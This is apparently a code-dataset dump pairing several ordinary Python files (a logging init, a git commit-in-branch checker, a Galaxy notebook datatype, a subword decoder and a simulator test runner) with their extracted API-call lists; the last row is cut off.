code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
"""Init file of source folder """
import logging.config
import yaml
import os
CURR_DIR = os.path.abspath(os.path.dirname(__file__))
LOG_CONFIG_PATH = os.path.join(CURR_DIR, "..", "cfg", "log_config.yaml")
FIXTURE_PATH = os.path.join(CURR_DIR, "..", "fixtures", "test_basic.json")
UNIT_TEST_DIR = os.path.join(CURR_DIR, "tests", "unit")
with open(LOG_CONFIG_PATH, "r") as f:
config = yaml.safe_load(f.read())
logging.config.dictConfig(config)
|
[
"os.path.dirname",
"os.path.join"
] |
[((151, 205), 'os.path.join', 'os.path.join', (['CURR_DIR', '""".."""', '"""cfg"""', '"""log_config.yaml"""'], {}), "(CURR_DIR, '..', 'cfg', 'log_config.yaml')\n", (163, 205), False, 'import os\n'), ((221, 280), 'os.path.join', 'os.path.join', (['CURR_DIR', '""".."""', '"""fixtures"""', '"""test_basic.json"""'], {}), "(CURR_DIR, '..', 'fixtures', 'test_basic.json')\n", (233, 280), False, 'import os\n'), ((297, 336), 'os.path.join', 'os.path.join', (['CURR_DIR', '"""tests"""', '"""unit"""'], {}), "(CURR_DIR, 'tests', 'unit')\n", (309, 336), False, 'import os\n'), ((106, 131), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (121, 131), False, 'import os\n')]
|
#!/usr/bin/env python3
import argparse
import subprocess
import sys
def print_(args: argparse.Namespace, success: bool, message: str) -> None:
    """
    Print function with extra coloring when supported and/or requested,
    and with a "quiet" switch
    """
    GREEN = '\033[32m'
    RED = '\033[31m'
    RESET = '\033[0m'

    if args.quiet:
        return

    # Colors are used when explicitly requested, or on 'auto' when stdout
    # is an interactive terminal.
    if args.color == 'auto':
        colorize = sys.stdout.isatty()
    else:
        colorize = args.color == 'always'

    if colorize:
        print((GREEN if success else RED) + message + RESET)
    else:
        print(message)
def is_commit_valid(commit: str) -> bool:
    """Return True if *commit* resolves to an object in the current git repo."""
    # `git cat-file -e` exits 0 iff the object exists; all output is discarded.
    status = subprocess.call(
        ['git', 'cat-file', '-e', commit],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return status == 0
def branch_has_commit(upstream: str, branch: str, commit: str) -> bool:
    """
    Returns True if the commit is actually present in the branch
    """
    # merge-base --is-ancestor exits 0 when `commit` is reachable from the
    # tip of <upstream>/<branch>.
    ref = upstream + '/' + branch
    status = subprocess.call(
        ['git', 'merge-base', '--is-ancestor', commit, ref],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return status == 0
def branch_has_backport_of_commit(upstream: str, branch: str, commit: str) -> str:
    """
    Returns the commit hash if the commit has been backported to the branch,
    or an empty string if is hasn't
    """
    # Cherry-picked commits carry a "cherry picked from commit <sha>" line in
    # their message; search the branchpoint..tip range of the branch for it.
    log_range = branch + '-branchpoint..' + upstream + '/' + branch
    out = subprocess.check_output(
        ['git', 'log', '--format=%H', log_range,
         '--grep', 'cherry picked from commit ' + commit],
        stderr=subprocess.DEVNULL,
    )
    return out.decode().strip()
def canonicalize_commit(commit: str) -> str:
    """
    Takes a commit-ish and returns a commit sha1 if the commit exists
    """
    # Reject anything git does not recognise before trying to resolve it.
    if not is_commit_valid(commit):
        raise argparse.ArgumentTypeError('invalid commit identifier: ' + commit)
    sha = subprocess.check_output(['git', 'rev-parse', commit],
                                  stderr=subprocess.DEVNULL)
    return sha.decode().strip()
def validate_branch(branch: str) -> str:
    """
    Validate a `remote/branch` argument for argparse.

    Checks that the named remote exists (per `git remote --verbose`) and
    that the full ref resolves to a commit.  Returns the argument unchanged
    on success.

    Raises:
        argparse.ArgumentTypeError: on a malformed value, unknown remote,
            or unresolvable branch.
    """
    if '/' not in branch:
        raise argparse.ArgumentTypeError('must be in the form `remote/branch`')
    out = subprocess.check_output(['git', 'remote', '--verbose'],
                                  stderr=subprocess.DEVNULL)
    remotes = out.decode().splitlines()
    # Split only on the FIRST '/': branch names may themselves contain
    # slashes (e.g. `origin/feature/foo`), which previously blew up the
    # two-element tuple unpacking with a ValueError.
    (upstream, _) = branch.split('/', 1)
    valid_remote = False
    for line in remotes:
        # `git remote --verbose` lines start with "<name>\t".
        if line.startswith(upstream + '\t'):
            valid_remote = True
            break
    if not valid_remote:
        raise argparse.ArgumentTypeError('Invalid remote: ' + upstream)
    if not is_commit_valid(branch):
        raise argparse.ArgumentTypeError('Invalid branch: ' + branch)
    return branch
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="""
Returns 0 if the commit is present in the branch,
1 if it's not,
and 2 if it couldn't be determined (eg. invalid commit)
""")
parser.add_argument('commit',
type=canonicalize_commit,
help='commit sha1')
parser.add_argument('branch',
type=validate_branch,
help='branch to check, in the form `remote/branch`')
parser.add_argument('--quiet',
action='store_true',
help='suppress all output; exit code can still be used')
parser.add_argument('--color',
choices=['auto', 'always', 'never'],
default='auto',
help='colorize output (default: true if stdout is a terminal)')
args = parser.parse_args()
(upstream, branch) = args.branch.split('/')
if branch_has_commit(upstream, branch, args.commit):
print_(args, True, 'Commit ' + args.commit + ' is in branch ' + branch)
exit(0)
backport = branch_has_backport_of_commit(upstream, branch, args.commit)
if backport:
print_(args, True,
'Commit ' + args.commit + ' was backported to branch ' + branch + ' as commit ' + backport)
exit(0)
print_(args, False, 'Commit ' + args.commit + ' is NOT in branch ' + branch)
exit(1)
|
[
"argparse.ArgumentParser",
"subprocess.check_output",
"sys.stdout.isatty",
"subprocess.call",
"argparse.ArgumentTypeError"
] |
[((773, 882), 'subprocess.call', 'subprocess.call', (["['git', 'cat-file', '-e', commit]"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "(['git', 'cat-file', '-e', commit], stdout=subprocess.\n DEVNULL, stderr=subprocess.DEVNULL)\n", (788, 882), False, 'import subprocess\n'), ((1115, 1261), 'subprocess.call', 'subprocess.call', (["['git', 'merge-base', '--is-ancestor', commit, upstream + '/' + branch]"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "(['git', 'merge-base', '--is-ancestor', commit, upstream +\n '/' + branch], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n", (1130, 1261), False, 'import subprocess\n'), ((1581, 1773), 'subprocess.check_output', 'subprocess.check_output', (["['git', 'log', '--format=%H', branch + '-branchpoint..' + upstream + '/' +\n branch, '--grep', 'cherry picked from commit ' + commit]"], {'stderr': 'subprocess.DEVNULL'}), "(['git', 'log', '--format=%H', branch +\n '-branchpoint..' + upstream + '/' + branch, '--grep', \n 'cherry picked from commit ' + commit], stderr=subprocess.DEVNULL)\n", (1604, 1773), False, 'import subprocess\n'), ((2200, 2285), 'subprocess.check_output', 'subprocess.check_output', (["['git', 'rev-parse', commit]"], {'stderr': 'subprocess.DEVNULL'}), "(['git', 'rev-parse', commit], stderr=subprocess.DEVNULL\n )\n", (2223, 2285), False, 'import subprocess\n'), ((2507, 2594), 'subprocess.check_output', 'subprocess.check_output', (["['git', 'remote', '--verbose']"], {'stderr': 'subprocess.DEVNULL'}), "(['git', 'remote', '--verbose'], stderr=subprocess.\n DEVNULL)\n", (2530, 2594), False, 'import subprocess\n'), ((3095, 3286), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""\n Returns 0 if the commit is present in the branch,\n 1 if it\'s not,\n and 2 if it couldn\'t be determined (eg. 
invalid commit)\n """'}), '(description=\n """\n Returns 0 if the commit is present in the branch,\n 1 if it\'s not,\n and 2 if it couldn\'t be determined (eg. invalid commit)\n """\n )\n', (3118, 3286), False, 'import argparse\n'), ((441, 460), 'sys.stdout.isatty', 'sys.stdout.isatty', ([], {}), '()\n', (458, 460), False, 'import sys\n'), ((2122, 2188), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('invalid commit identifier: ' + commit)"], {}), "('invalid commit identifier: ' + commit)\n", (2148, 2188), False, 'import argparse\n'), ((2430, 2495), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (['"""must be in the form `remote/branch`"""'], {}), "('must be in the form `remote/branch`')\n", (2456, 2495), False, 'import argparse\n'), ((2869, 2926), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('Invalid remote: ' + upstream)"], {}), "('Invalid remote: ' + upstream)\n", (2895, 2926), False, 'import argparse\n'), ((2978, 3033), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('Invalid branch: ' + branch)"], {}), "('Invalid branch: ' + branch)\n", (3004, 3033), False, 'import argparse\n')]
|
# -*- coding: utf-8 -*-
#from galaxy.datatypes.json_datatyp import Json as JsonClass
from galaxy.datatypes.data import Text
from galaxy.datatypes.data import get_file_peek
from galaxy import util
import subprocess
import tempfile
import logging
import json
import os
# Module-level logger named after this module's import path.
log = logging.getLogger(__name__)
#class Ipynb( JsonClass ):
class Ipynb( Text ):
    """Galaxy datatype for IPython/Jupyter notebook (.ipynb) files."""
    file_ext = "ipynb"

    def set_peek( self, dataset, is_multi_byte=False ):
        """Set the peek text and blurb shown for the dataset in the UI."""
        if not dataset.dataset.purged:
            dataset.peek = get_file_peek( dataset.file_name, is_multi_byte=is_multi_byte )
            dataset.blurb = "IPython Notebook"
        else:
            dataset.peek = 'file does not exist'
            dataset.blurb = 'file purged from disc'

    def sniff( self, filename ):
        """
        Try to load the string with the json module. If successful it's a json file.
        """
        try:
            # Use a context manager so the file handle is always closed;
            # the previous `json.load(open(filename))` leaked the handle.
            with open(filename) as handle:
                ipynb = json.load(handle)
            if ipynb.get('nbformat', False) != False and ipynb.get('metadata', False):
                return True
            else:
                return False
        except Exception:
            return False

    def display_data(self, trans, dataset, preview=False, filename=None, to_ext=None, chunk=None, **kwd):
        """Serve the notebook raw, chunked, or converted to HTML for preview."""
        preview = util.string_as_bool( preview )
        if chunk:
            return self.get_chunk(trans, dataset, chunk)
        elif to_ext or not preview:
            return self._serve_raw(trans, dataset, to_ext)
        else:
            ofile_handle = tempfile.NamedTemporaryFile(delete=False)
            ofilename = ofile_handle.name
            ofile_handle.close()
            # Kept only for the log message below.
            cmd = 'ipython nbconvert --to html --template basic %s --output %s' % (dataset.file_name, ofilename)
            try:
                # Pass an argument list with shell=False so file names containing
                # spaces or shell metacharacters cannot break (or inject into)
                # the command line.
                subprocess.call(['ipython', 'nbconvert', '--to', 'html',
                                 '--template', 'basic', dataset.file_name,
                                 '--output', ofilename])
                ofilename = '%s.html' % ofilename
            except Exception:
                # Fall back to serving the raw notebook as plain text.
                ofilename = dataset.file_name
                log.exception( 'Command "%s" failed. Could not convert the IPython Notebook to HTML, defaulting to plain text.' % cmd )
            return open( ofilename )

    def set_meta( self, dataset, **kwd ):
        """
        Set the number of models in dataset.
        """
        pass
|
[
"tempfile.NamedTemporaryFile",
"galaxy.datatypes.data.get_file_peek",
"galaxy.util.string_as_bool",
"subprocess.call",
"logging.getLogger"
] |
[((287, 314), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (304, 314), False, 'import logging\n'), ((1310, 1338), 'galaxy.util.string_as_bool', 'util.string_as_bool', (['preview'], {}), '(preview)\n', (1329, 1338), False, 'from galaxy import util\n'), ((518, 579), 'galaxy.datatypes.data.get_file_peek', 'get_file_peek', (['dataset.file_name'], {'is_multi_byte': 'is_multi_byte'}), '(dataset.file_name, is_multi_byte=is_multi_byte)\n', (531, 579), False, 'from galaxy.datatypes.data import get_file_peek\n'), ((1558, 1599), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (1585, 1599), False, 'import tempfile\n'), ((1830, 1862), 'subprocess.call', 'subprocess.call', (['cmd'], {'shell': '(True)'}), '(cmd, shell=True)\n', (1845, 1862), False, 'import subprocess\n')]
|
from SpmTextEncoder import SpmTextEncoder
import sys
import argparse
if __name__ == '__main__':
    # Decode whitespace-separated subword indices read from stdin back to text.
    arg_parser = argparse.ArgumentParser(description='decoder')
    arg_parser.add_argument("--model", type=str, help="path to model(indices)")
    cli_args = arg_parser.parse_args()
    encoder = SpmTextEncoder(cli_args.model)
    for raw_line in sys.stdin:
        ids = [int(tok) for tok in raw_line.strip().split()]
        sys.stdout.write(encoder.decode(ids))
        sys.stdout.write("\n")
"""
cat ~/nmt/sample_idx.txt | python decode.py --model \
~/nmt/t2t_data_enzh_encoder/vocab.translatespm_enzh_ai50k.50000.subwords.en.model
"""
|
[
"sys.stdout.write",
"SpmTextEncoder.SpmTextEncoder",
"argparse.ArgumentParser"
] |
[((112, 158), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""decoder"""'}), "(description='decoder')\n", (135, 158), False, 'import argparse\n'), ((276, 302), 'SpmTextEncoder.SpmTextEncoder', 'SpmTextEncoder', (['args.model'], {}), '(args.model)\n', (290, 302), False, 'from SpmTextEncoder import SpmTextEncoder\n'), ((414, 436), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (430, 436), False, 'import sys\n')]
|
#!/usr/bin/env python3
import os
import numpy as np
import jax.numpy as jnp
from multiprocessing import Pool, Manager, Condition, Value, Process
import sys
import io
import time
import yaml
import re
import traceback
import subprocess
from .utils import *
from rich.progress import (
Progress,
TextColumn,
BarColumn,
TimeElapsedColumn,
TimeRemainingColumn
)
def sync_variable():
    """Install shared state (as module globals) used to synchronise the
    runner worker processes with the main process."""
    mgr = Manager()
    globals()["manager"] = mgr
    globals()["result_dict"] = mgr.dict()          # case -> short result string
    globals()["result_condition"] = Condition()    # guards the shared result dicts
    globals()["result_detail_dict"] = mgr.dict()   # case -> detailed failure text
    globals()["tests"] = Value('L', 0)             # total sub-case counter
    globals()["fails"] = Value('L', 0)             # failed sub-case counter
# run failed cases last time
def get_retry_cases():
    """
    Re-collect the cases that failed in the previous run.

    Reads log/runner_report.log (written by gen_runner_report); lines are
    either "PASS <case>" or "FAIL <case>".  Returns the list of failed case
    names.  Exits with 0 when everything passed (nothing to retry) and with
    -1 when no report log is readable.
    """
    print("retry last failed cases...")
    if not os.access('log/runner_report.log', os.R_OK):
        print('could not retry without last run log.')
        sys.exit(-1)
    cases = []
    with open('log/runner_report.log') as fp:
        for line in fp.read().splitlines():
            if line.startswith('PASS '):
                continue
            cases.append(line.replace('FAIL ', ''))
    # Previously this check sat after an unconditional `return cases`, so it
    # was dead code and a fully-passing report silently "retried" nothing
    # instead of aborting cleanly.
    if len(cases) == 0:
        print('all pass, retry abort.')
        sys.exit(0)
    return cases
# get cases from arguments
def get_arg_cases(args_cases):
    """
    Parse the case-selection argument: either a readable file with one case
    per line, or a comma-separated list.  Blank entries and '#' comment
    lines are dropped.  Returns a (possibly empty) list of case names.
    """
    def _clean(raw_items):
        # strip whitespace, then drop blanks and comment entries
        stripped = [item.strip() for item in raw_items]
        return [item for item in stripped if item and not item.startswith('#')]

    if os.access(args_cases, os.R_OK):
        with open(args_cases) as fp:
            return _clean(fp.read().splitlines())
    if args_cases != '':
        return _clean(args_cases.split(','))
    return []
def get_generator_case():
    """
    Read log/generator_case.log ("<case_name>, <num>" per line, blank lines
    and '#' comments allowed) and return [case_names, case_counts] as two
    parallel lists.
    """
    with open("log/generator_case.log") as fp:
        raw_lines = [line.strip() for line in fp.read().splitlines()]
    info_lines = [line for line in raw_lines if line and not line.startswith('#')]
    case_names = []
    case_counts = []
    for entry in info_lines:
        # exactly two comma-separated fields expected per line
        [case_name, case_num] = re.split(r'\s*,\s*', entry)
        case_names.append(case_name)
        case_counts.append(int(case_num))
    return [case_names, case_counts]
def select_run_case( generator_case_list, generator_num_list, cases ):
    """
    Filter the generated case list by the user selection.

    Each entry of `cases` is a substring pattern; a generated case is kept
    (once) when any pattern occurs in its name.  With an empty selection
    every generated case runs.  Returns [run_case_list, total_num].
    """
    if len(cases) == 0:
        # no selection given: run everything
        return [generator_case_list, sum(generator_num_list)]

    selected = []
    selected_total = 0
    for case_name, case_num in zip(generator_case_list, generator_num_list):
        if any(pattern in case_name for pattern in cases):
            selected.append(case_name)
            selected_total += case_num
    return [selected, selected_total]
def process_bar_setup( total_num ):
    """
    Build and start the rich progress bar for the runner.

    Returns [progress, task_id] so callers can update and stop it.
    """
    # Column layout: name | bar | percentage | case count | elapsed | remaining.
    bar = Progress(
        TextColumn("[bold blue]{task.fields[name]}"),
        BarColumn(bar_width=None),
        "[progress.percentage]{task.percentage:>3.1f}%",
        "case_sum:",
        TextColumn("[bold red]{task.total}"),
        "elapsed:",
        TimeElapsedColumn(),
        "remaining:",
        TimeRemainingColumn()
    )
    bar.start()
    runner_task = bar.add_task("runner", name = "runner", total=total_num, start=True)
    return [bar, runner_task]
def runner_error(case):
    """
    Pool error callback: record a crashed runner process for *case* in the
    shared result dicts and persist the message to the case's runner.log.
    """
    with result_condition:
        result_dict[case] = "python run failed."
        result_detail_dict[case] = ''
    with open(f'build/{case}/runner.log', 'w') as log_file:
        log_file.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
def runner_callback(progress, task_id, completed, total):
    """Pool success callback: advance the progress bar to `completed`.

    `total` is accepted for signature compatibility; the task total was
    fixed when the task was added.
    """
    progress.update(task_id, completed=completed)
def gen_runner_report( ps, args, generator_case_list, generator_num_list ):
    """
    Collect the results of all runner processes and write log/runner_report.log.

    ps: list of (case, AsyncResult) pairs; each AsyncResult yields the
    io.StringIO that run_test returned (its captured stdout/stderr).
    Reads the shared result_dict filled in by the workers.  Returns the
    number of failed cases.

    NOTE(review): generator_case_list / generator_num_list are accepted but
    never used in this function — confirm whether they can be dropped.
    """
    failed_num = 0
    # save the runner result into the log file
    report = open(f'log/runner_report.log', 'w')
    for case, p in ps:
        ok = True
        # blocks until the worker finishes; the worker's captured output
        p_str = p.get().getvalue()
        # find case result in result_dict
        if result_dict[case] != "ok":
            reason = result_dict[case]
            ok = False
        if p_str != '':
            # persist anything the worker printed alongside the case artefacts
            with open(f'build/{case}/runner.log', 'w') as f:
                f.write(p_str)
        if not ok:
            failed_num += 1
            if args.failing_info:
                # presumably lets the progress bar redraw before the failure
                # line is printed — TODO confirm
                time.sleep(0.5)
                print(f'FAIL {case} - {reason}')
            report.write(f'FAIL {case} - {reason}\n')
        else:
            report.write(f'PASS {case}\n')
    report.close()
    return failed_num
# the main entrance of the runner process, including run in simulators and check the data
def run_test(case, args):
    """
    Worker-process entry: run one generated case and check its results.

    Runs the case ELF in spike, compares the spike signature against the
    python golden data, then optionally re-runs in vcs/verilator/gem5 and
    diffs those signatures against spike's.  Results are published through
    the shared dicts installed by sync_variable(); everything this worker
    prints is captured and returned as an io.StringIO for the parent to
    persist.
    """
    try:
        # redirect this worker's prints into a buffer returned to the parent
        stdout = sys.stdout
        stderr = sys.stderr
        output = io.StringIO()
        sys.stdout = output
        sys.stderr = output
        # file information
        binary = f'build/{case}/test.elf'
        run_mem = f'build/{case}/run.mem'
        run_log = f'build/{case}/spike.log'
        res_file = f'build/{case}/spike.sig'
        check_golden = f'build/{case}/check_golden.npy'
        # get the cases list in the case, including test_num, name, check string, golden
        case_list = np.load( check_golden, allow_pickle=True )
        # run elf in spike to check if the elf is right
        ret = spike_run(args, run_mem, binary, run_log, res_file)
        if ret != 0:
            # if failed, set the result of every case as spike-run, means failed when run in spike
            # then return, stop testing this case
            with result_condition:
                result_dict[case] = "spike-run"
                result_detail_dict[case] = f'\nspike-run failed!!!\nPlease check the spike log in {run_log} '
                fails.value += len(case_list)
                tests.value += len(case_list)
            with open(f'build/{case}/runner.log', 'w') as f:
                f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
            sys.stdout = stdout
            sys.stderr = stderr
            return output
        # use these two variables to keep test info for this case
        test_result = ''
        test_detail = ''
        # use this to count failed subcases in this case
        failed_case_list = []
        # check the golden result computed by python with the spike result
        spike_result = {}
        start_dict = {}
        read_elf_cmd = args.config['compile']['readelf'] + ' -s ' + binary
        try:
            addr_begin_sig_str = str( subprocess.check_output( read_elf_cmd + ' | grep begin_signature ', shell=True ), encoding = 'utf-8' )
            addr_begin_sig = int( addr_begin_sig_str.split()[1], 16 )
            flag_begin_sig = True
        except:
            flag_begin_sig = False
        for test_case in case_list:
            if test_case["check_str"] != '':
                # when test["check_str"] == 0, no need to check
                if flag_begin_sig:
                    try:
                        addr_testdata_str = str( subprocess.check_output( read_elf_cmd + f' | grep test_{test_case["no"]}_data ', shell=True ), encoding = 'utf-8' )
                        addr_testdata = int( addr_testdata_str.split()[1], 16 )
                    except:
                        test_result += test_case["name"]+f'_faild_find_{test_case["no"]}_test_data-'
                        test_detail += f"Can't find symbol test_{test_case['no']}_data, please check build/{case}/test.map.\n"
                        failed_case_list.append(test_case["name"])
                        continue
                    golden = test_case["golden"] = copy_to_dtype( test_case["golden_data"], eval(f'jnp.{test_case["golden_dtype"]}') )
                    #because many subcases in one signature file, so we need the spike_start to know where to find the result
                    result = from_txt( res_file, golden, addr_testdata - addr_begin_sig )
                    start_dict[test_case["name"]] = addr_testdata - addr_begin_sig
                    spike_result[test_case["name"]] = result
                    #save the python golden result and spike result into check.data file of each case
                    os.makedirs(f'build/{test_case["name"]}', exist_ok=True)
                    check_result = check_to_txt( golden, result, f'build/{test_case["name"]}/check.data', test_case["check_str"] )
                    if not check_result:
                        # if check failed, set result as "check failed", because the elf can be run in more sims, so don't use result_dict and notify result_condition
                        test_result += test_case["name"]+"_check failed-"
                        test_detail += f'The python golden data and spike results of test case {test_case["no"]} in build/{case}/test.S check failed. You can find the data in build/{test_case["name"]}/check.data\n'
                        failed_case_list.append(test_case["name"])
                else:
                    test_result += test_case["name"]+"_faild_find_begin_signature"
                    test_detail += f"Can't find symbol begin_signature, please check build/{case}/test.map.\n"
                    failed_case_list.append(test_case["name"])
        # run case in more simulators and compare simulator results with spike results, which need to be same
        sims_result = sims_run( args, f'build/{case}', binary )
        for sim in [ "vcs", "verilator", "gem5" ]:
            if args.config[sim]['path'] == None:
                # don't set the path of sim, so dont't run it and needn't judge the result
                continue
            if sims_result[sim] != 0:
                # sim run failed
                # because the elf maybe can be run in more sims, so don't use result_dict and notify result_condition
                test_result += sim + "_failed-"
                test_detail += f'{binary} runned unsuccessfully in {sim}, please check build/{case}/{sim}.log\n'
                # BUG FIX: copy into a real list — assigning the loaded array
                # directly meant later .append() calls would fail on it.
                failed_case_list = list(case_list)
            else:
                # sim run successfully, so we compare the sim results with spike results
                for test_case in case_list:
                    if test_case["check_str"] != '':
                        golden = test_case["golden"]
                        # get sim result, because many cases in one signature file, so we need the start to know where to find the result
                        if test_case["name"] in start_dict.keys():
                            result = from_txt( f'build/{case}/{sim}.sig', golden, start_dict[test_case["name"]] )
                        else:
                            test_result += test_case["name"] + '_' + sim + f"_failed_find_{test_case['no']}_start-"
                            # BUG FIX: this message was assigned to a throwaway
                            # local (`test_detail_dict`) and silently lost.
                            test_detail += f"Can't find test case {test_case['no']} start addr computed when check golden and spike result in build/{case}/test.S, please verify that.\n"
                            # maybe check failed or other sim failed either so we have this judge s
                            if test_case["name"] not in failed_case_list:
                                failed_case_list.append(test_case["name"])
                            continue
                        # save the spike result and sim result into diff-sim.data
                        os.makedirs(f'build/{test_case["name"]}', exist_ok=True)
                        diff_result = diff_to_txt( spike_result[test_case["name"]], result, f'build/{test_case["name"]}/diff-{sim}.data', "spike", sim )
                        if not diff_result:
                            # if spike result don't equal with sim result, diff failed, write 'sim_diff failed' to test_result
                            test_result += test_case["name"] + '_' + sim + "_diff failed-"
                            # BUG FIX: likewise was lost in `test_detail_dict`.
                            test_detail += f'The results of spike and {sim} of test case {test_case["no"]}in build/{case}/test.S check failed. You can find the data in build/{test_case["name"]}/diff-{sim}.data\n'
                            # maybe check failed or other sim failed either so we have this judge
                            if test_case["name"] not in failed_case_list:
                                failed_case_list.append(test_case["name"])
        with result_condition:
            if test_result == '':
                result_dict[case] = "ok"
                result_detail_dict[case] = ''
                tests.value += len(case_list)
            else:
                result_dict[case] = test_result
                result_detail_dict[case] = test_detail
                fails.value += len(failed_case_list)
                tests.value += len(case_list)
        with open(f'build/{case}/runner.log', 'w') as f:
            f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
        sys.stdout = stdout
        sys.stderr = stderr
        return output
    except:
        # BUG FIX: was `if output in locals().keys()`, which compares the
        # StringIO *object* against the local variable *names* (always False,
        # and a NameError when `output` is unbound).  The intended test is a
        # name-membership check.
        if 'output' in locals():
            sys.stdout = stdout
            sys.stderr = stderr
        else:
            output = io.StringIO()
        result_dict[case] = 'python failed'
        error_output = io.StringIO()
        traceback.print_tb(sys.exc_info()[2], file=error_output)
        error_str = error_output.getvalue()
        error_str += "\nUnexpected error: " + str(sys.exc_info()[0]) + " " + str(sys.exc_info()[1])
        result_detail_dict[case] = error_str
        with open(f'build/{case}/runner.log', 'w') as f:
            f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
        # print(error_str)
        return output
def main(args):
    """
    Runner entry point: dispatch every selected case to a process pool,
    track progress, and write the final report.

    Exits 0 when every case passes, -1 on failures or KeyboardInterrupt.
    """
    try:
        # define some global sync variables to synchronize the runner processes with the main process
        sync_variable()
        if args.retry:
            cases = get_retry_cases()
        else:
            cases = get_arg_cases(args.cases)
        print("looking for the cases...")
        [generator_case_list, generator_num_list] = get_generator_case()
        [run_case_list, total_num] = select_run_case( generator_case_list, generator_num_list, cases )
        [progress, task_id] = process_bar_setup( total_num )
        ps = []
        with Pool(processes=args.nproc) as pool:
            for case in run_case_list:
                # BUG FIX: bind `case` as a lambda default — a plain closure is
                # late-bound, so every error callback would have reported the
                # *last* case of the loop instead of its own.
                res = pool.apply_async(run_test, [ case, args ],
                        callback=lambda _: runner_callback( progress, task_id, tests.value, total_num ),
                        error_callback=lambda _, case=case: runner_error(case) )
                ps.append((case, res))
            # BUG FIX: collect results *inside* the `with Pool` block —
            # Pool.__exit__ calls terminate(), which would kill outstanding
            # workers before their results were fetched.
            failed_num = gen_runner_report( ps, args, generator_case_list, generator_num_list )
        progress.stop()
        # spike may make that user can't input in command line, use stty sane to fix that.
        os.system("stty sane")
        if failed_num == 0:
            print(f'{len(ps)} files running finish, all pass.( {tests.value} tests )')
            sys.exit(0)
        else:
            if args.failing_info:
                print(f'{len(ps)} files running finish, {failed_num} failed.( {tests.value} tests, {fails.value} failed.)')
            else:
                print(f'{len(ps)} files running finish, {failed_num} failed.( {tests.value} tests, {fails.value} failed, please look at the log/runner_report.log for the failing information. )')
            sys.exit(-1)
    except KeyboardInterrupt:
        # shut down cleanly on Ctrl-C: stop workers and the progress bar
        if 'pool' in locals():
            pool.close()
            pool.join()
        if 'progress' in locals():
            progress.stop()
        print("Catch KeyboardInterrupt!")
        os.system("stty sane")
        sys.exit(-1)
if __name__ == "__main__":
main()
|
[
"io.StringIO",
"numpy.load",
"re.split",
"rich.progress.TextColumn",
"os.makedirs",
"multiprocessing.Manager",
"subprocess.check_output",
"multiprocessing.Value",
"rich.progress.TimeElapsedColumn",
"multiprocessing.Condition",
"os.system",
"rich.progress.BarColumn",
"time.sleep",
"rich.progress.TimeRemainingColumn",
"sys.exc_info",
"multiprocessing.Pool",
"os.access",
"sys.exit"
] |
[((494, 503), 'multiprocessing.Manager', 'Manager', ([], {}), '()\n', (501, 503), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((586, 597), 'multiprocessing.Condition', 'Condition', ([], {}), '()\n', (595, 597), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((676, 689), 'multiprocessing.Value', 'Value', (['"""L"""', '(0)'], {}), "('L', 0)\n", (681, 689), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((715, 728), 'multiprocessing.Value', 'Value', (['"""L"""', '(0)'], {}), "('L', 0)\n", (720, 728), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((829, 872), 'os.access', 'os.access', (['"""log/runner_report.log"""', 'os.R_OK'], {}), "('log/runner_report.log', os.R_OK)\n", (838, 872), False, 'import os\n'), ((1529, 1559), 'os.access', 'os.access', (['args_cases', 'os.R_OK'], {}), '(args_cases, os.R_OK)\n', (1538, 1559), False, 'import os\n'), ((1370, 1382), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (1378, 1382), False, 'import sys\n'), ((3111, 3155), 'rich.progress.TextColumn', 'TextColumn', (['"""[bold blue]{task.fields[name]}"""'], {}), "('[bold blue]{task.fields[name]}')\n", (3121, 3155), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3165, 3190), 'rich.progress.BarColumn', 'BarColumn', ([], {'bar_width': 'None'}), '(bar_width=None)\n', (3174, 3190), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3278, 3314), 'rich.progress.TextColumn', 'TextColumn', (['"""[bold red]{task.total}"""'], {}), "('[bold red]{task.total}')\n", (3288, 3314), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3344, 3363), 'rich.progress.TimeElapsedColumn', 'TimeElapsedColumn', ([], {}), '()\n', (3361, 3363), False, 'from rich.progress import Progress, 
